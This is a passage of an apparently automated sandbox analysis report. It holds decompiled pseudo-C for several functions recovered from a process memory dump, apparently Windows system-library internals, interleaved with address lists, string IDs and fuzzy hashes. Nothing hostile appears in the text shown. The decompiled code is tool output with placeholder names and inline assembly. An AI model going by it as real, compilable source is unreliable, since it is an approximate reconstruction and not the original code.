                                          								if( *0xef6901 != 0) {
                                          									_push(0);
                                          									_push(1);
                                          									_push(0);
                                          									_push(0x100003);
                                          									_push( &_v12);
                                          									_t72 = E00E49980();
                                          									__eflags = _t72;
                                          									if(_t72 < 0) {
                                          										_v12 = _t98 | 0xffffffff;
                                          									}
                                          								}
                                          								asm("lock cmpxchg [ecx], edx");
                                          								_t111 = 0;
                                          								__eflags = 0;
                                          								if(0 != 0) {
                                          									__eflags = _v12 - 0xffffffff;
                                          									if(_v12 != 0xffffffff) {
                                          										_push(_v12);
                                          										E00E495D0();
                                          									}
                                          								} else {
                                          									_t111 = _v12;
                                          								}
                                          								return _t111;
                                          							} else {
                                          								if(_t89 != 0) {
                                          									 *((intOrPtr*)(_v32 + 0xf84)) = 0;
                                          									_t77 = E00E27D50();
                                          									__eflags = _t77;
                                          									if(_t77 == 0) {
                                          										_t64 = 0x7ffe0384;
                                          									} else {
                                          										_t64 = ( *[fs:0x30])[0x50] + 0x22a;
                                          									}
                                          									__eflags =  *_t64;
                                          									if( *_t64 != 0) {
                                          										_t64 =  *[fs:0x30];
                                          										__eflags = _t64[0x240] & 0x00000004;
                                          										if((_t64[0x240] & 0x00000004) != 0) {
                                          											_t78 = E00E27D50();
                                          											__eflags = _t78;
                                          											if(_t78 == 0) {
                                          												_t64 = 0x7ffe0385;
                                          											} else {
                                          												_t64 = ( *[fs:0x30])[0x50] + 0x22b;
                                          											}
                                          											__eflags =  *_t64 & 0x00000020;
                                          											if(( *_t64 & 0x00000020) != 0) {
                                          												_t64 = E00E87016(0x1483, _t97 | 0xffffffff, 0xffffffff, 0xffffffff, 0, 0);
                                          											}
                                          										}
                                          									}
                                          								}
                                          								return _t64;
                                          							}
                                          						}
                                          						_t97 = _t88;
                                          						_t93 = _t109;
                                          						E00E9FDDA(_t97, _v12);
                                          						_t105 =  *_t109;
                                          						_t67 = _v12 + 1;
                                          						_v12 = _t67;
                                          						__eflags = _t105 - 0xffffffff;
                                          						if(_t105 == 0xffffffff) {
                                          							_t106 = 0;
                                          							__eflags = 0;
                                          						} else {
                                          							_t106 =  *(_t105 + 0x14);
                                          						}
                                          						__eflags = _t67 - 2;
                                          						if(_t67 > 2) {
                                          							__eflags = _t109 - 0xef5350;
                                          							if(_t109 != 0xef5350) {
                                          								__eflags = _t106 - _v20;
                                          								if(__eflags == 0) {
                                          									_t93 = _t109;
                                          									E00E9FFB9(_t88, _t93, _t97, _t106, _t109, __eflags);
                                          								}
                                          							}
                                          						}
                                          						_push("RTL: Re-Waiting\n");
                                          						_push(0);
                                          						_push(0x65);
                                          						_v20 = _t106;
                                          						E00E95720();
                                          						_t104 = _v28;
                                          						_t116 = _t116 + 0xc;
                                          						continue;
                                          					}
                                          				}
                                          			}




































                                          0x00e02d8a
                                          0x00e02d8a
                                          0x00e02d92
                                          0x00e02d96
                                          0x00e02d9e
                                          0x00e02da0
                                          0x00e02da3
                                          0x00e02da5
                                          0x00e02da8
                                          0x00e02dab
                                          0x00e02db2
                                          0x00e5f9aa
                                          0x00e5f9ab
                                          0x00e5f9ae
                                          0x00e5f9ae
                                          0x00e02db8
                                          0x00e02dc2
                                          0x00e5f9b9
                                          0x00e5f9be
                                          0x00e5f9bf
                                          0x00e5f9bf
                                          0x00e02dcf
                                          0x00e5f9c9
                                          0x00e02dd5
                                          0x00e02dd5
                                          0x00e02dd5
                                          0x00e02dde
                                          0x00e02de1
                                          0x00e02e70
                                          0x00e02e72
                                          0x00e02e72
                                          0x00e02de7
                                          0x00e02deb
                                          0x00e02e7c
                                          0x00e02e83
                                          0x00e02e85
                                          0x00e02e8b
                                          0x00e02e8d
                                          0x00e02e92
                                          0x00e02e92
                                          0x00e02e85
                                          0x00e02df1
                                          0x00e02df7
                                          0x00e02df9
                                          0x00e02df9
                                          0x00e02dfc
                                          0x00e02dff
                                          0x00e02e02
                                          0x00000000
                                          0x00e02e05
                                          0x00e02e0c
                                          0x00e5f9d9
                                          0x00e02e12
                                          0x00e02e12
                                          0x00e02e12
                                          0x00e02e1a
                                          0x00e5f9e3
                                          0x00e5f9e9
                                          0x00e5f9f0
                                          0x00e5f9f6
                                          0x00e5f9f8
                                          0x00e5f9f8
                                          0x00e5f9f0
                                          0x00e02e23
                                          0x00e5fa02
                                          0x00e5fa03
                                          0x00e5fa05
                                          0x00e5fa06
                                          0x00000000
                                          0x00e02e29
                                          0x00e02e29
                                          0x00e02e2e
                                          0x00e02e34
                                          0x00e02e3e
                                          0x00000000
                                          0x00000000
                                          0x00e02e44
                                          0x00e02e47
                                          0x00e02e4d
                                          0x00000000
                                          0x00000000
                                          0x00e02e4f
                                          0x00e02e54
                                          0x00000000
                                          0x00000000
                                          0x00e02e5a
                                          0x00e02e5f
                                          0x00e02e9a
                                          0x00e02ea4
                                          0x00e02ea5
                                          0x00e02ea8
                                          0x00e02eaf
                                          0x00e02eb2
                                          0x00e02eb5
                                          0x00e5fae9
                                          0x00e5faeb
                                          0x00e5faed
                                          0x00e5faef
                                          0x00e5faf7
                                          0x00e5faf8
                                          0x00e5fafd
                                          0x00e5faff
                                          0x00e5fb04
                                          0x00e5fb04
                                          0x00e5faff
                                          0x00e02ec0
                                          0x00e02ec4
                                          0x00e02ec6
                                          0x00e02ec8
                                          0x00e5fb14
                                          0x00e5fb18
                                          0x00e5fb1e
                                          0x00e5fb21
                                          0x00e5fb21
                                          0x00e02ece
                                          0x00e02ece
                                          0x00e02ece
                                          0x00e02ed7
                                          0x00e02e61
                                          0x00e02e63
                                          0x00e5fa6b
                                          0x00e5fa71
                                          0x00e5fa76
                                          0x00e5fa78
                                          0x00e5fa8a
                                          0x00e5fa7a
                                          0x00e5fa83
                                          0x00e5fa83
                                          0x00e5fa8f
                                          0x00e5fa91
                                          0x00e5fa97
                                          0x00e5fa9d
                                          0x00e5faa4
                                          0x00e5faaa
                                          0x00e5faaf
                                          0x00e5fab1
                                          0x00e5fac3
                                          0x00e5fab3
                                          0x00e5fabc
                                          0x00e5fabc
                                          0x00e5fac8
                                          0x00e5facb
                                          0x00e5fadf
                                          0x00e5fadf
                                          0x00e5facb
                                          0x00e5faa4
                                          0x00e5fa91
                                          0x00e02e6f
                                          0x00e02e6f
                                          0x00e02e5f
                                          0x00e5fa13
                                          0x00e5fa15
                                          0x00e5fa17
                                          0x00e5fa1f
                                          0x00e5fa21
                                          0x00e5fa22
                                          0x00e5fa25
                                          0x00e5fa28
                                          0x00e5fa2f
                                          0x00e5fa2f
                                          0x00e5fa2a
                                          0x00e5fa2a
                                          0x00e5fa2a
                                          0x00e5fa31
                                          0x00e5fa34
                                          0x00e5fa36
                                          0x00e5fa3c
                                          0x00e5fa3e
                                          0x00e5fa41
                                          0x00e5fa43
                                          0x00e5fa45
                                          0x00e5fa45
                                          0x00e5fa41
                                          0x00e5fa3c
                                          0x00e5fa4a
                                          0x00e5fa4f
                                          0x00e5fa51
                                          0x00e5fa53
                                          0x00e5fa56
                                          0x00e5fa5b
                                          0x00e5fa5e
                                          0x00000000
                                          0x00e5fa5e
                                          0x00e02e23

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: RTL: Re-Waiting
                                          • API String ID: 0-316354757
                                          • Opcode ID: 9b02073095e5300b63d63dea2e43ee7c2d9fe0ba0e5d3a80566cf158b0b69983
                                          • Instruction ID: 2ea41dfaf31c64041963ceb296c4c3e1ad28a75c4064387d92e5e9336528ab23
                                          • Opcode Fuzzy Hash: 9b02073095e5300b63d63dea2e43ee7c2d9fe0ba0e5d3a80566cf158b0b69983
                                          • Instruction Fuzzy Hash: 1B614931A006059FDB32DF68C849BBE77E5EB40318F242A79EA55B72C2C7349D85C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 80%
                                          			E00ED0EA5(void* __ecx, void* __edx) {
                                          				signed int _v20;
                                          				char _v24;
                                          				intOrPtr _v28;
                                          				unsigned int _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				char _v44;
                                          				intOrPtr _v64;
                                          				void* __ebx;
                                          				void* __edi;
                                          				signed int _t58;
                                          				unsigned int _t60;
                                          				intOrPtr _t62;
                                          				char* _t67;
                                          				char* _t69;
                                          				void* _t80;
                                          				void* _t83;
                                          				intOrPtr _t93;
                                          				intOrPtr _t115;
                                          				char _t117;
                                          				void* _t120;
                                          
                                          				_t83 = __edx;
                                          				_t117 = 0;
                                          				_t120 = __ecx;
                                          				_v44 = 0;
                                          				if(E00ECFF69(__ecx,  &_v44,  &_v32) < 0) {
                                          					L24:
                                          					_t109 = _v44;
                                          					if(_v44 != 0) {
                                          						E00ED1074(_t83, _t120, _t109, _t117, _t117);
                                          					}
                                          					L26:
                                          					return _t117;
                                          				}
                                          				_t93 =  *((intOrPtr*)(__ecx + 0x3c));
                                          				_t5 = _t83 + 1; // 0x1
                                          				_v36 = _t5 << 0xc;
                                          				_v40 = _t93;
                                          				_t58 =  *(_t93 + 0xc) & 0x40000000;
                                          				asm("sbb ebx, ebx");
                                          				_t83 = ( ~_t58 & 0x0000003c) + 4;
                                          				if(_t58 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t93);
                                          					_push(0xffffffff);
                                          					_t80 = E00E49730();
                                          					_t115 = _v64;
                                          					if(_t80 < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t115) {
                                          						_push(_t93);
                                          						E00ECA80D(_t115, 1, _v20, _t117);
                                          						_t83 = 4;
                                          					}
                                          				}
                                          				if(E00ECA854( &_v44,  &_v36, _t117, 0x40001000, _t83, _t117,  *((intOrPtr*)(_t120 + 0x34)),  *((intOrPtr*)(_t120 + 0x38))) < 0) {
                                          					goto L24;
                                          				}
                                          				_t60 = _v32;
                                          				_t97 = (_t60 != 0x100000) + 1;
                                          				_t83 = (_v44 -  *0xef8b04 >> 0x14) + (_v44 -  *0xef8b04 >> 0x14);
                                          				_v28 = (_t60 != 0x100000) + 1;
                                          				_t62 = _t83 + (_t60 >> 0x14) * 2;
                                          				_v40 = _t62;
                                          				if(_t83 >= _t62) {
                                          					L10:
                                          					asm("lock xadd [eax], ecx");
                                          					asm("lock xadd [eax], ecx");
                                          					if(E00E27D50() == 0) {
                                          						_t67 = 0x7ffe0380;
                                          					} else {
                                          						_t67 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          					}
                                          					if( *_t67 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          						E00EC138A(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v36, 0xc);
                                          					}
                                          					if(E00E27D50() == 0) {
                                          						_t69 = 0x7ffe0388;
                                          					} else {
                                          						_t69 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                          					}
                                          					if( *_t69 != 0) {
                                          						E00EBFEC0(_t83,  *((intOrPtr*)(_t120 + 0x3c)), _v44, _v32);
                                          					}
                                          					if(( *0xef8724 & 0x00000008) != 0) {
                                          						E00EC52F8( *((intOrPtr*)(_t120 + 0x3c)),  *((intOrPtr*)(_t120 + 0x28)));
                                          					}
                                          					_t117 = _v44;
                                          					goto L26;
                                          				}
                                          				while(E00ED15B5(0xef8ae4, _t83, _t97, _t97) >= 0) {
                                          					_t97 = _v28;
                                          					_t83 = _t83 + 2;
                                          					if(_t83 < _v40) {
                                          						continue;
                                          					}
                                          					goto L10;
                                          				}
                                          				goto L24;
                                          			}

























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 571227aae51eb4705a405c34be60b4761d403ac05addbcc5c8daa90a7177c909
                                          • Instruction ID: f086525ef16e66ff4c8a3e4bbfc4afb93c3e327209dd74c1606e02d76543556d
                                          • Opcode Fuzzy Hash: 571227aae51eb4705a405c34be60b4761d403ac05addbcc5c8daa90a7177c909
                                          • Instruction Fuzzy Hash: 8551DE712083419FD324EF28D981B2BB7E5EBC4304F18196EF992A7391D631E846CB62
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00E3F0BF(signed short* __ecx, signed short __edx, void* __eflags, intOrPtr* _a4) {
                                          				intOrPtr _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr _v16;
                                          				char* _v20;
                                          				intOrPtr _v24;
                                          				char _v28;
                                          				intOrPtr _v32;
                                          				char _v36;
                                          				char _v44;
                                          				char _v52;
                                          				intOrPtr _v56;
                                          				char _v60;
                                          				intOrPtr _v72;
                                          				void* _t51;
                                          				void* _t58;
                                          				signed short _t82;
                                          				short _t84;
                                          				signed int _t91;
                                          				signed int _t100;
                                          				signed short* _t103;
                                          				void* _t108;
                                          				intOrPtr* _t109;
                                          
                                          				_t103 = __ecx;
                                          				_t82 = __edx;
                                          				_t51 = E00E24120(0, __ecx, 0,  &_v52, 0, 0, 0);
                                          				if(_t51 >= 0) {
                                          					_push(0x21);
                                          					_push(3);
                                          					_v56 =  *0x7ffe02dc;
                                          					_v20 =  &_v52;
                                          					_push( &_v44);
                                          					_v28 = 0x18;
                                          					_push( &_v28);
                                          					_push(0x100020);
                                          					_v24 = 0;
                                          					_push( &_v60);
                                          					_v16 = 0x40;
                                          					_v12 = 0;
                                          					_v8 = 0;
                                          					_t58 = E00E49830();
                                          					_t87 =  *[fs:0x30];
                                          					_t108 = _t58;
                                          					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v72);
                                          					if(_t108 < 0) {
                                          						L11:
                                          						_t51 = _t108;
                                          					} else {
                                          						_push(4);
                                          						_push(8);
                                          						_push( &_v36);
                                          						_push( &_v44);
                                          						_push(_v60);
                                          						_t108 = E00E49990();
                                          						if(_t108 < 0) {
                                          							L10:
                                          							_push(_v60);
                                          							E00E495D0();
                                          							goto L11;
                                          						} else {
                                          							_t109 = L00E24620(_t87,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t82 + 0x18);
                                          							if(_t109 == 0) {
                                          								_t108 = 0xc0000017;
                                          								goto L10;
                                          							} else {
                                          								_t21 = _t109 + 0x18; // 0x18
                                          								 *((intOrPtr*)(_t109 + 4)) = _v60;
                                          								 *_t109 = 1;
                                          								 *((intOrPtr*)(_t109 + 0x10)) = _t21;
                                          								 *(_t109 + 0xe) = _t82;
                                          								 *((intOrPtr*)(_t109 + 8)) = _v56;
                                          								 *((intOrPtr*)(_t109 + 0x14)) = _v32;
                                          								E00E4F3E0(_t21, _t103[2],  *_t103 & 0x0000ffff);
                                          								 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          								 *((short*)(_t109 + 0xc)) =  *_t103;
                                          								_t91 =  *_t103 & 0x0000ffff;
                                          								_t100 = _t91 & 0xfffffffe;
                                          								_t84 = 0x5c;
                                          								if( *((intOrPtr*)(_t103[2] + _t100 - 2)) != _t84) {
                                          									if(_t91 + 4 > ( *(_t109 + 0xe) & 0x0000ffff)) {
                                          										_push(_v60);
                                          										E00E495D0();
                                          										L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t109);
                                          										_t51 = 0xc0000106;
                                          									} else {
                                          										 *((short*)(_t100 +  *((intOrPtr*)(_t109 + 0x10)))) = _t84;
                                          										 *((short*)( *((intOrPtr*)(_t109 + 0x10)) + 2 + (( *_t103 & 0x0000ffff) >> 1) * 2)) = 0;
                                          										 *((short*)(_t109 + 0xc)) =  *((short*)(_t109 + 0xc)) + 2;
                                          										goto L5;
                                          									}
                                          								} else {
                                          									L5:
                                          									 *_a4 = _t109;
                                          									_t51 = 0;
                                          								}
                                          							}
                                          						}
                                          					}
                                          				}
                                          				return _t51;
                                          			}


























                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: @
                                          • API String ID: 0-2766056989
                                          • Opcode ID: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction ID: 945785d5e79b4138db32fb5c50e362a0938b81856a779771dbd2e4606ad352b6
                                          • Opcode Fuzzy Hash: 4b412e15f740e7d19b187a206102b9820fe056b1c8be356b654954a4ccb32fe9
                                          • Instruction Fuzzy Hash: 2851AD71504710AFC320DF28C841A6BBBF8FF48710F108A2EF995A7691E7B4E904CB91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 75%
                                          			E00E83540(intOrPtr _a4) {
                                          				signed int _v12;
                                          				intOrPtr _v88;
                                          				intOrPtr _v92;
                                          				char _v96;
                                          				char _v352;
                                          				char _v1072;
                                          				intOrPtr _v1140;
                                          				intOrPtr _v1148;
                                          				char _v1152;
                                          				char _v1156;
                                          				char _v1160;
                                          				char _v1164;
                                          				char _v1168;
                                          				char* _v1172;
                                          				short _v1174;
                                          				char _v1176;
                                          				char _v1180;
                                          				char _v1192;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				void* __ebp;
                                          				short _t41;
                                          				short _t42;
                                          				intOrPtr _t80;
                                          				intOrPtr _t81;
                                          				signed int _t82;
                                          				void* _t83;
                                          
                                          				_v12 =  *0xefd360 ^ _t82;
                                          				_t41 = 0x14;
                                          				_v1176 = _t41;
                                          				_t42 = 0x16;
                                          				_v1174 = _t42;
                                          				_v1164 = 0x100;
                                          				_v1172 = L"BinaryHash";
                                          				_t81 = E00E40BE0(0xfffffffc,  &_v352,  &_v1164, 0, 0, 0,  &_v1192);
                                          				if(_t81 < 0) {
                                          					L11:
                                          					_t75 = _t81;
                                          					E00E83706(0, _t81, _t79, _t80);
                                          					L12:
                                          					if(_a4 != 0xc000047f) {
                                          						E00E4FA60( &_v1152, 0, 0x50);
                                          						_v1152 = 0x60c201e;
                                          						_v1148 = 1;
                                          						_v1140 = E00E83540;
                                          						E00E4FA60( &_v1072, 0, 0x2cc);
                                          						_push( &_v1072);
                                          						E00E5DDD0( &_v1072, _t75, _t79, _t80, _t81);
                                          						E00E90C30(0, _t75, _t80,  &_v1152,  &_v1072, 2);
                                          						_push(_v1152);
                                          						_push(0xffffffff);
                                          						E00E497C0();
                                          					}
                                          					return E00E4B640(0xc0000135, 0, _v12 ^ _t82, _t79, _t80, _t81);
                                          				}
                                          				_t79 =  &_v352;
                                          				_t81 = E00E83971(0, _a4,  &_v352,  &_v1156);
                                          				if(_t81 < 0) {
                                          					goto L11;
                                          				}
                                          				_t75 = _v1156;
                                          				_t79 =  &_v1160;
                                          				_t81 = E00E83884(_v1156,  &_v1160,  &_v1168);
                                          				if(_t81 >= 0) {
                                          					_t80 = _v1160;
                                          					E00E4FA60( &_v96, 0, 0x50);
                                          					_t83 = _t83 + 0xc;
                                          					_push( &_v1180);
                                          					_push(0x50);
                                          					_push( &_v96);
                                          					_push(2);
                                          					_push( &_v1176);
                                          					_push(_v1156);
                                          					_t81 = E00E49650();
                                          					if(_t81 >= 0) {
                                          						if(_v92 != 3 || _v88 == 0) {
                                          							_t81 = 0xc000090b;
                                          						}
                                          						if(_t81 >= 0) {
                                          							_t75 = _a4;
                                          							_t79 =  &_v352;
                                          							E00E83787(_a4,  &_v352, _t80);
                                          						}
                                          					}
                                          					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v1168);
                                          				}
                                          				_push(_v1156);
                                          				E00E495D0();
                                          				if(_t81 >= 0) {
                                          					goto L12;
                                          				} else {
                                          					goto L11;
                                          				}
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryHash
                                          • API String ID: 0-2202222882
                                          • Opcode ID: a61822d1d0b5d918f8bb3d718fcd2848ffc67dd9791c7372642b3202e45cd0d2
                                          • Instruction ID: eb1f2d14f96f0c26ebf205156b6c00a71adf75f5ee0bb824790e6240849d63ad
                                          • Opcode Fuzzy Hash: a61822d1d0b5d918f8bb3d718fcd2848ffc67dd9791c7372642b3202e45cd0d2
                                          • Instruction Fuzzy Hash: DF4135F1D0152CAADB21EA64DC81F9EB77CAB44714F0055A5EA0DB7241EB309F888F94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 71%
                                          			E00ED05AC(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                          				signed int _v20;
                                          				char _v24;
                                          				signed int _v28;
                                          				char _v32;
                                          				signed int _v36;
                                          				intOrPtr _v40;
                                          				void* __ebx;
                                          				void* _t35;
                                          				signed int _t42;
                                          				char* _t48;
                                          				signed int _t59;
                                          				signed char _t61;
                                          				signed int* _t79;
                                          				void* _t88;
                                          
                                          				_v28 = __edx;
                                          				_t79 = __ecx;
                                          				if(E00ED07DF(__ecx, __edx,  &_a4,  &_a8, 0) == 0) {
                                          					L13:
                                          					_t35 = 0;
                                          					L14:
                                          					return _t35;
                                          				}
                                          				_t61 = __ecx[1];
                                          				_t59 = __ecx[0xf];
                                          				_v32 = (_a4 << 0xc) + (__edx - ( *__ecx & __edx) >> 4 << _t61) + ( *__ecx & __edx);
                                          				_v36 = _a8 << 0xc;
                                          				_t42 =  *(_t59 + 0xc) & 0x40000000;
                                          				asm("sbb esi, esi");
                                          				_t88 = ( ~_t42 & 0x0000003c) + 4;
                                          				if(_t42 != 0) {
                                          					_push(0);
                                          					_push(0x14);
                                          					_push( &_v24);
                                          					_push(3);
                                          					_push(_t59);
                                          					_push(0xffffffff);
                                          					if(E00E49730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t59) {
                                          						_push(_t61);
                                          						E00ECA80D(_t59, 1, _v20, 0);
                                          						_t88 = 4;
                                          					}
                                          				}
                                          				_t35 = E00ECA854( &_v32,  &_v36, 0, 0x1000, _t88, 0,  *((intOrPtr*)(_t79 + 0x34)),  *((intOrPtr*)(_t79 + 0x38)));
                                          				if(_t35 < 0) {
                                          					goto L14;
                                          				}
                                          				E00ED1293(_t79, _v40, E00ED07DF(_t79, _v28,  &_a4,  &_a8, 1));
                                          				if(E00E27D50() == 0) {
                                          					_t48 = 0x7ffe0380;
                                          				} else {
                                          					_t48 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                          				}
                                          				if( *_t48 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                          					E00EC138A(_t59,  *((intOrPtr*)(_t79 + 0x3c)), _v32, _v36, 0xa);
                                          				}
                                          				goto L13;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: `
                                          • API String ID: 0-2679148245
                                          • Opcode ID: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction ID: 94a4e37af872c64d3114cf049c442a501b81acd7dd905c59a59221a1e74922ac
                                          • Opcode Fuzzy Hash: 39b8bc2de1f442ef1f569125be10905dd0dd778863a6d43cfec09233fd0d58f3
                                          • Instruction Fuzzy Hash: FC312432204305ABE720DE24CD45F9B77D9EBC4758F08522AF964AB781E770ED15C7A1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 72%
                                          			E00E83884(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                          				char _v8;
                                          				intOrPtr _v12;
                                          				intOrPtr* _v16;
                                          				char* _v20;
                                          				short _v22;
                                          				char _v24;
                                          				intOrPtr _t38;
                                          				short _t40;
                                          				short _t41;
                                          				void* _t44;
                                          				intOrPtr _t47;
                                          				void* _t48;
                                          
                                          				_v16 = __edx;
                                          				_t40 = 0x14;
                                          				_v24 = _t40;
                                          				_t41 = 0x16;
                                          				_v22 = _t41;
                                          				_t38 = 0;
                                          				_v12 = __ecx;
                                          				_push( &_v8);
                                          				_push(0);
                                          				_push(0);
                                          				_push(2);
                                          				_t43 =  &_v24;
                                          				_v20 = L"BinaryName";
                                          				_push( &_v24);
                                          				_push(__ecx);
                                          				_t47 = 0;
                                          				_t48 = E00E49650();
                                          				if(_t48 >= 0) {
                                          					_t48 = 0xc000090b;
                                          				}
                                          				if(_t48 != 0xc0000023) {
                                          					_t44 = 0;
                                          					L13:
                                          					if(_t48 < 0) {
                                          						L16:
                                          						if(_t47 != 0) {
                                          							L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t44, _t47);
                                          						}
                                          						L18:
                                          						return _t48;
                                          					}
                                          					 *_v16 = _t38;
                                          					 *_a4 = _t47;
                                          					goto L18;
                                          				}
                                          				_t47 = L00E24620(_t43,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                                          				if(_t47 != 0) {
                                          					_push( &_v8);
                                          					_push(_v8);
                                          					_push(_t47);
                                          					_push(2);
                                          					_push( &_v24);
                                          					_push(_v12);
                                          					_t48 = E00E49650();
                                          					if(_t48 < 0) {
                                          						_t44 = 0;
                                          						goto L16;
                                          					}
                                          					if( *((intOrPtr*)(_t47 + 4)) != 1 ||  *(_t47 + 8) < 4) {
                                          						_t48 = 0xc000090b;
                                          					}
                                          					_t44 = 0;
                                          					if(_t48 < 0) {
                                          						goto L16;
                                          					} else {
                                          						_t17 = _t47 + 0xc; // 0xc
                                          						_t38 = _t17;
                                          						if( *((intOrPtr*)(_t38 + ( *(_t47 + 8) >> 1) * 2 - 2)) != 0) {
                                          							_t48 = 0xc000090b;
                                          						}
                                          						goto L13;
                                          					}
                                          				}
                                          				_t48 = _t48 + 0xfffffff4;
                                          				goto L18;
                                          			}

                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
                                          • API ID:
                                          • String ID: BinaryName
                                          • API String ID: 0-215506332
                                          • Opcode ID: 3cec4c1cfa9ead5be86d14f6831d3f7d08f9b143293f300eede18bf545ebe77f
                                          • Instruction ID: c875141dd54e50c0c3a398e2784a13a103c4e3220367e13e0393d936e4e832b8
                                          • Opcode Fuzzy Hash: 3cec4c1cfa9ead5be86d14f6831d3f7d08f9b143293f300eede18bf545ebe77f
                                          • Instruction Fuzzy Hash: F131013290051AAFDB19EA68C945EAFB7B4EB80B20F115169E85DB7291D7709F00CBA0
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          C-Code - Quality: 33%
                                          			E00E3D294(void* __ecx, char __edx, void* __eflags) {
                                          				signed int _v8;
                                          				char _v52;
                                          				signed int _v56;
                                          				signed int _v60;
                                          				intOrPtr _v64;
                                          				char* _v68;
                                          				intOrPtr _v72;
                                          				char _v76;
                                          				signed int _v84;
                                          				intOrPtr _v88;
                                          				char _v92;
                                          				intOrPtr _v96;
                                          				intOrPtr _v100;
                                          				char _v104;
                                          				char _v105;
                                          				void* __ebx;
                                          				void* __edi;
                                          				void* __esi;
                                          				signed int _t35;
                                          				char _t38;
                                          				signed int _t40;
                                          				signed int _t44;
                                          				signed int _t52;
                                          				void* _t53;
                                          				void* _t55;
                                          				void* _t61;
                                          				intOrPtr _t62;
                                          				void* _t64;
                                          				signed int _t65;
                                          				signed int _t66;
                                          
                                          				_t68 = (_t66 & 0xfffffff8) - 0x6c;
                                          				_v8 =  *0xefd360 ^ (_t66 & 0xfffffff8) - 0x0000006c;
                                          				_v105 = __edx;
                                          				_push( &_v92);
                                          				_t52 = 0;
                                          				_push(0);
                                          				_push(0);
                                          				_push( &_v104);
                                          				_push(0);
                                          				_t59 = __ecx;
                                          				_t55 = 2;
                                          				if(E00E24120(_t55, __ecx) < 0) {
                                          					_t35 = 0;
                                          					L8:
                                          					_pop(_t61);
                                          					_pop(_t64);
                                          					_pop(_t53);
                                          					return E00E4B640(_t35, _t53, _v8 ^ _t68, _t59, _t61, _t64);
                                          				}
                                          				_v96 = _v100;
                                          				_t38 = _v92;
                                          				if(_t38 != 0) {
                                          					_v104 = _t38;
                                          					_v100 = _v88;
                                          					_t40 = _v84;
                                          				} else {
                                          					_t40 = 0;
                                          				}
                                          				_v72 = _t40;
                                          				_v68 =  &_v104;
                                          				_push( &_v52);
                                          				_v76 = 0x18;
                                          				_push( &_v76);
                                          				_v64 = 0x40;
                                          				_v60 = _t52;
                                          				_v56 = _t52;
                                          				_t44 = E00E498D0();
                                          				_t62 = _v88;
                                          				_t65 = _t44;
                                          				if(_t62 != 0) {
                                          					asm("lock xadd [edi], eax");
                                          					if((_t44 | 0xffffffff) != 0) {
                                          						goto L4;
                                          					}
                                          					_push( *((intOrPtr*)(_t62 + 4)));
                                          					E00E495D0();
                                          					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _t62);
                                          					goto L4;
                                          				} else {
                                          					L4:
                                          					L00E277F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t52, _v96);
                                          					if(_t65 >= 0) {
                                          						_t52 = 1;
                                          					} else {
                                          						if(_t65 == 0xc0000043 || _t65 == 0xc0000022) {
                                          							_t52 = _t52 & 0xffffff00 | _v105 != _t52;
                                          						}
                                          					}
                                          					_t35 = _t52;
                                          					goto L8;
                                          				}
                                          			}


































                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000011.00000002.396359420.0000000000DE0000.00000040.00000001.sdmp, Offset: 00DE0000, based on PE: true
                                          Similarity
